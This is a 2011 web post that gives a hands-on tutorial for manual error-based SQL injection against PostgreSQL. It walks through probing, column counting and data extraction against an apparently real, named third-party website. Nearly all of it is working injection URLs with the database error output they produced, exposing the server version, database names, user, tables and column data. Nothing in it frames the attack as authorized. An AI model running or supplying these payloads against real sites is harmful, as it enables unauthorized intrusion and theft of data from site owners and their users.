Main » 2011 November 25 » MANUAL POSTGRE ERROR BASED SQL INJECTION TUTORIAL
2:11 AM MANUAL POSTGRE ERROR BASED SQL INJECTION TUTORIAL | |
Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings, money, and dates. Lets start to play with Postgre: we have a sql error based vulnerable website:1st Step find the vulnerability: Code: http://www.creatop.com.cn/index.cfm?MenuID=80'ERROR: syntax error at or near "''" its mean this website can be injected.remember errors can varies you wont get the same error every time.2nd Step Columns count: Code: http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--get valid page Code: http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--Error Executing Database Query. ERROR: ORDER BY position 2 is not in select list That Error shows that there is one column.Lets try UNION SELECT query: Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--Error Executing Database Query. ERROR: UNION types character varying and integer cannot be matched Seems like UNION SELECT query is not working !!! Lets try Errorbased Postgre SQLi… 3rd Step: Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" As we can see we got version of postgre DB server in the form of error.Lets move on and find database name. Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: "scoutsqld" Scoutsqld is 1st database name you can variey offset to get other databases names. scoutsqld is first database we can get others by changing offset :) Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: "template0" template0 is 2nd database so you can increase offset till you got error.Lets find out the user: Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: "postgres" postgres is the user :)Lets find the tables :> 4th step: Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: "pg_type" pg_type is first table we can get others by changing offset :)5th step: Now we have to find the columns from our specific table !!! e.g our table is action for that we have to use oracle char conversion.Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) so our query is : Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: " typname " And further you can find the columns using offset..Last step: Now we have to extract data from our column . Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: "bool" | |
|
| |
| Total comments: 0 | |
